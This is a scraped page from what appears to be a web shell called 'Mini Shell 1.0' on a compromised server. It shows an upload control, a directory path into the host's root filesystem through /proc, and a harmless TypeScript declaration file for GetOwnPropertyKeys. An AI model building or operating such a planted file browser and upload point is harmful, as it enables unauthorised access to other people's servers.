HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/nodejs/@types/es-abstract/2015/
Upload File :
Current File : //proc/1991111/root/usr/share/nodejs/@types/es-abstract/2015/GetOwnPropertyKeys.d.ts
declare function GetOwnPropertyKeys<O extends object>(
    O: O,
    Type: 'String',
): Array<number extends keyof O ? string : Extract<keyof O, string>>;
declare function GetOwnPropertyKeys<O extends object>(
    O: O,
    Type: 'Symbol',
): Array<Extract<keyof O, symbol>>;
declare function GetOwnPropertyKeys<O extends object>(
    O: O,
    Type: 'String' | 'Symbol',
):
    | Array<number extends keyof O ? string : Extract<keyof O, string>>
    | Array<Extract<keyof O, symbol>>;
export = GetOwnPropertyKeys;